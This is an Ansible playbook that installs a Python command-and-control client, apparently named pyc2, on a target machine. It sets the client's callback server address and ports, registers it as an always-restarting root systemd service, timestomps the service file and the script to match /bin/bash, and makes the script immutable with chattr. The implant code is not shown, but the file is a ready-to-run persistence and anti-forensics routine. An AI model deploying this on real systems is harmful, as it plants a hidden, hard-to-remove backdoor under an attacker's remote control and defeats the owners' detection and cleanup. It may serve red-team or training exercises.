---
- name: Copy shell script to target system
  copy:
    src: "files/client.py"
    dest: "{{ pyc2_client_location_unix }}"
    owner: root
    group: root
    mode: '0755'

# Need to do this as separate tasks
- name: Update TIMEOUT value
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^TIMEOUT_TIME=.*'
    replace: 'TIMEOUT_TIME={{ pyc2_timeout_time }}'

- name: Update server IP
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^SERVER=.*'
    replace: 'SERVER="{{ pyc2_server }}"'

- name: Update server port
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^SERVER_PORT=.*'
    replace: 'SERVER_PORT={{ pyc2_port }}'

- name: Update server port range
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^PORT_RADIUS=.*'
    replace: 'PORT_RADIUS={{ pyc2_port_range }}'

- name: Update firewall name
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^FIREWALL_NAME=.*'
    replace: 'FIREWALL_NAME="{{ pyc2_firewall_name }}"'

- name: Update DEBUG value
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^DEBUG=.*'
    replace: 'DEBUG={{ pyc2_debug }}'

- name: Update BUFFER value
  replace:
    path: "{{ pyc2_client_location_unix }}"
    regexp: '^BUFFER_SIZE=.*'
    replace: 'BUFFER_SIZE={{ pyc2_buffer_size }}'

- name: Create systemd service to execute script
  copy:
    dest: "/etc/systemd/system/{{ pyc2_service_name }}.service"
    content: |
      [Unit]
      Description={{ pyc2_service_description }}
      After=network.target

      [Service]
      ExecStart=/usr/bin/python3 {{ pyc2_client_location_unix }}
      Restart=always
      RestartSec=60
      User=root

      [Install]
      WantedBy=multi-user.target

- name: Reload systemd to recognize new service
  systemd:
    daemon_reload: yes

- name: Enable and start the new service
  systemd:
    name: "{{ pyc2_service_name }}"
    enabled: yes
    state: started

- name: Timestomp the systemd service file
  command: touch -r /bin/bash /etc/systemd/system/{{ pyc2_service_name }}.service

- name: Timestomp script to match /bin/bash creation time
  command: touch -r /bin/bash {{ pyc2_client_location_unix }}

- name: Set immutable attribute on script
  command: "chattr +i {{ pyc2_client_location_unix }}"
